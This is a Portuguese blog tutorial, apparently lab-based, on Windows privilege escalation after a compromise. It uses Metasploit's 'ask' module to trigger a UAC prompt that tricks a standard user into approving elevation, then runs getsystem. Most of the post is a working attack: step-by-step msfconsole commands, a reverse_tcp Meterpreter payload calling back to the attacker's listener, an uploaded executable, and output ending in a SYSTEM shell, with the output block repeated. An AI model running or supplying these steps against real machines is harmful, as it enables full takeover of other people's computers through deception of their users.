Suponha que invadiu um computador, onde reparou que o usuário que estava logado, era um usuário comum ou seja não era administrador do sistema. Talvez realizou várias tentativas de ataques procurando paths vulneráveis a escalação de privilégios porém sem sucesso.
Em ultimo caso, se não houver nenhuma vulnerabilidades de escalação de privilégios, é obter o privilegio de sistema interagindo com o usuário. Em tecnologia esta técnica é chamada de engenharia social. Onde iremos enviar uma requisição via UAC para o usuario, caso recebermos a resposta com as informações necessárias, conseguiremos o usuário administrator e com isso será bem fácil obter privilegio de sistema.
Abaixo vou estar demonstrando e explicando sobre cada passo realizado.
É importante ressaltar que para seguir os passos citados abaixo, você já deve ter o acesso da máquina e está com a sessão do meterpreter em aberto, pois este lab é baseado em pós-exploração.
orientaçãoemtecnologia.com |
- 1º passo: usar o exploit de ask para solicitar a senha adminitrativa via UAC ao usuario "use exploit/windows/local/ask".
- 2º passo: Realizar configurações de sessões, host local e porta local. No meu caso configurei na sessão 5, pois o meterpreter está na sessão 5. configurei o lhost no ip do meu kali e configurei a porta 10 para a escuta.
- 3º passo: Após configurações e set, digite o comando exploit para iniciar o processo de exploração com UAC.
- 4º passo: Após receber a sessão do meterpreter, digite getsystem para obter o privilégio de sistema.
windows privilege escalation
msf exploit(windows/local/ask) > sessions 5
[*] Starting interaction with 5...
meterpreter > getuid
Server username: WIN-MPA05BP9C25\usuario comum
meterpreter >
msf exploit(windows/local/ask) > sessions -l
[*] Starting interaction with 5...
meterpreter > getuid
Server username: WIN-MPA05BP9C25\usuario comum
meterpreter >
msf exploit(windows/local/ask) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
5 meterpreter x86/windows WIN-MPA05BP9C25\usuario comum @ WIN-MPA05BP9C25 192.168.190.134:2 -> 192.168.190.128:49511 (192.168.190.128)
msf exploit(windows/local/ask) > use exploit/windows/local/ask
msf exploit(windows/local/ask) > show options
Module options (exploit/windows/local/ask):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no File name on disk
PATH no Location on disk, %TEMP% used if not set
SESSION 2 yes The session to run this module on.
TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.190.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf exploit(windows/local/ask) > set session 5
session => 5
msf exploit(windows/local/ask) > set lport 10
lport => 10
msf exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.190.134:10
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading gHuEgWSBCBok.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (179779 bytes) to 192.168.190.128
[*] Meterpreter session 6 opened (192.168.190.134:10 -> 192.168.190.128:49599) at 2020-01-31 23:46:06 -0200
meterpreter >
meterpreter > getuid
Server username: WIN-MPA05BP9C25\Administrador
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: AUTORIDADE NT\SISTEMA
meterpreter >
[*] Started reverse TCP handler on 192.168.190.134:10
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading gHuEgWSBCBok.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (179779 bytes) to 192.168.190.128
[*] Meterpreter session 6 opened (192.168.190.134:10 -> 192.168.190.128:49599) at 2020-01-31 23:46:06 -0200
meterpreter >
meterpreter > getuid
Server username: WIN-MPA05BP9C25\Administrador
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: AUTORIDADE NT\SISTEMA
meterpreter >
Neste vídeo aula, estarei mostrando na pratica sobre cada passo realizado de acordo com as técnicas de ataques demonstrada acima. Para melhor acompanhar, assista esta aula.
Postado por, Josué Pedro.
Formado em Sistema da Informação pela Universidade Nove de Julho, Pós graduado em Cyber Security pela Impacta Parceria com a Daryus.
Há um bom tempo que trabalha na Área da tecnologia da Informação e é criador de conteúdos para canal de youtube e mídia social.
Tem auto conhecimento em Tecnologia, Mídia Social, Marketing Digital, SEO, Goolge Adword, Google Adsense, Google Master.
Nas horas disponível, trabalha como freelancer procurando bugs vulneráveis em sistemas através da plataforma "Hacker One".
Trabalha também com freelancer em projetos relacionado a tecnologia através da plataforma Workana.